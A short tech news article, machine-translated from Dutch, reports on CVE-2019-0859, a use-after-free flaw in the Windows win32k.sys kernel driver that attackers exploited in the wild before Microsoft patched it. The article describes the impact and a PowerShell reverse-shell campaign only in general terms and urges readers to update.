A bug in the Windows kernel is actively exploited in cyber attacks to completely take over an affected system. The zero-day leak was discovered and patched by Microsoft last week.
The leak was discovered by Kaspersky Lab researchers and was also abused in the wild before Microsoft was notified. The researchers discovered attacks against various 64-bit Windows systems, ranging from Windows 7 to older Windows 10 builds.
The bug was fixed last week by Microsoft as part of the monthly Patch Tuesday, along with 73 other errors, including a second zero-day. Updating is the message if it hasn’t been done yet.
Use-After-Free
The so-called Use-After-Free vulnerability (CVE-2019-0859) is present in the win32k.sys kernel driver and is caused by objects in the memory not being processed correctly.
An attacker who exploits this vulnerability can run any code in kernel mode, warns Microsoft. The attacker can then install programs; view, modify or delete data; or create new accounts with full user rights.
In short: a successful exploit gives the attacker full control over the system. However, in order to exploit the vulnerability, an attacker must first enter the system in one way or another.
PowerShell
The Kaspersky researchers found that the vulnerability was actively exploited to create a trivial HTTP Reverse Shell, or a backdoor, as part of a three-stage PowerShell exploitation process.
The use of Powershell scripts in cyber attacks increased by 1,000% last year, according to Symantec’s latest trend report. It confirms a long-standing trend where attackers use legitimate and freely available tools and techniques (living-of-the-land) to spread their malware and hide an attack for as long as possible.
This news article was automatically translated from Dutch to give Techzine.eu a head start. All news articles after September 1, 2019 are written in native English and NOT translated. All our background stories are written in native English as well. For more information read our launch article.
1 hour ago
